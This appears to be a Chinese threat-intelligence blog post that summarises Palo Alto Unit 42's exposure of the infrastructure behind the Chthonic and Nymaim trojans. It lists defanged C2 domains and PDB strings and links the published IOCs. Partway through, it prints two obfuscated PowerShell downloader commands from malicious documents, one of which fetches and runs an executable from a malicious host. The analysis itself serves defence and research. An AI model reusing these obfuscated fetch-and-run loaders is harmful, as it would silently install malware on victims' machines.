近期一大批恶意URL和IP地址被安全厂商曝光。例如:Palo Alto 在分析使用 PowerShell的恶意软件时,发现了 Chthonic 和 Nymaim等木马实施攻击所使用的“基础设施”。
常见的PowerShell 通常是从使用 VBA 宏的 Microsoft Office 文档中启动的, 并进一步下载和执行“真正”的恶意软件。但最近发现了从 Notepad++网站下载文件的样本——Chthonic ~!~!
<null> , cMd.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='%ap';$uy='pdat';$ji='a%.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://notepad-plus-plus[.]org/repository/7.x/7.4.2/npp.7.4.2.Installer.exe'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"
Chthonic 就是利用了上述代码实现了从合法的NotePad ++ 网站下载文件。
通过查看 PowerShell 命令中的变量, Jeff White最终发现了171个文档样本, 它们都是近期出现的, 并都具有相同的“诱饵”主题。从中还提取了用于下载有效负载的24个 url。
8月份编译生成的一个样本中出现了波兰语的诱饵文档、甚至波兰语的字符串“你真的认为我不是病毒吗?”
cMd.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='%ap';$uy='pdat';$ji='a%.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://farhenzel[.]co/gls.exe'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"
遍历了171个样本之后, 得到下载文件的哈希值列表。进而发现有效载荷比样本少, 这表明许多文档下载相同的Payload。而这些Payload中涉及到了如下一些 PDB 字符串。
C:\RAMDrive\Charles\heaven\reams\Teac.pdb
C:\Cleaner\amuse\rang\AutoPopulate\la.pdb
C:\TableAdapter\encyclopedia\Parik.pdb
C:\ayakhnin\reprductive\distortedc.pdb
C:\positioning\scrapping\Szets\thi.pdb
C:\NeXT\volatile\legacyExchangeDNs.pdb
C:\Snapshot\Diskette\hiding\ROCKMA.pdb
C:\mdb\Changed\Container\praise.pdb
C:\helpers\better\Expr\Eight\DS.pdb
C:\V\regard\violates\update\AMBW\a.pdb
C:\executablery\constructed\IIc.pdb
C:\letterbxing\EVP\Chices\legit.pdb
C:\Biomuse\moment\705\cnvincing.pdb
C:\cataloging\Dr\VarianceShadows11.pdb
C:\dumplings\That\BIT\Warez\loc.pdb
C:\Lgisys\hypothesized\donatedc.pdb
C:\work\cr\nata\cpp\seven\seven\re
一旦文件下载并执行, 新的进程将启动一个合法的可执行, 如 "msiexec.exe", 并注入代码到它。
然后, 此代码将通过对各种网站的 POST 请求下载进一步的有效Payload。这些 HTTP 请求与名为 Chthonic 的银行木马的已知模式匹配, 是Zeus的变种。
amellet[.]bit
danrnysvp[.]com
ejtmjealr[.]com
firop[.]com
gefinsioje[.]com
gesofgamd[.]com
ponedobla[.]bit
unoset[.]com
Palo Alto 给出了这些网站在7月的三次大的活动。
ejtmjealr[.]com
gefinsioje[.]com
gesofgamd[.]com
ponedobla[.]bit
而从上述这4个站中,他们又发现了5520多样本在对它们进行 HTTP 请求, 并且这些示例已被标识为另一个下载程序的木马, 名为 Nymaim~!~!
而‘ejtmjealr[.]com’与 ‘ejdqzkd[.]com’十分相似,Talos 之前已经对Nymaim 如何利用这些域的有过详细论述。
利用Maltego 和 PassiveTotal 分析上述域,发现了总共707个与他们相关的 IP 地址。
接下来使用反向 DNS 来发现更多与它们相关的站点。进一步分析还发现这些“基础设施”也用于分发其他恶意软件家族, 如 Locky 。
这些“基础设施”还被用于托管非法服务,例如:非法论坛;还有些被恶意软件Hancitor 所利用... ...
其中部分还涉及到例如:
premarket[.]ws类似域名被用于非法服务;
slilpp[.]ws,有类似典型尼日利亚网络犯罪模式的帐户和用户名快速审查;
... ...
目前707 个IP和2611个域名已经被公布在GitHub 上了。
https://github.com/pan-unit42/iocs/tree/master/notepadcase
S认为:恶意软件间存在着多维度的同源性,而对于网络犯罪的溯源工作来讲,使用相同的C&C服务器、具有相同的网络行为等是比较直接的溯源证据链了吧~!
但该案例却从另一个角度说明:
由于网络犯罪所需的域名、C&C服务器等资源对于任何黑客或犯罪组织来讲都是不容小觑的重要“资源”,因此在网络犯罪正逐渐“国际化”的时代,组织间共享信息基础资源当然是首选了。
而黑客及组织间的这种基础设施合作模式,会被其中某些水平“low”的个体拖下水,例如本案例。
不过,这种情况下具有相同信息资源(域名、C&C服务器等)的恶意软件将很难再被证明是来自同一黑客或组织了~!
值得庆贺的是无论如何本次行动将对若干黑客及组织产生重要打击~!
同时,针对上述地址和域名,以及关联的恶意软件和背后“黑手”的分析,还可以持续进行,童鞋们 加油呢~!
上述部分地址和域名资源,MalwareBenchmark也在持续关注,有信息的朋友们可以交流啊~! 请看我们7月份关于尼日利亚钓鱼的分析... ...
订阅号内相关文章(点击可阅读)
参考:
https://www.cert.pl/en/news/single/nymaim-revisited/
https://researchcenter.paloaltonetworks.com/2017/08/unit42-the-curious-case-of-notepad-and-chthonic-exposing-a-malicious-infrastructure/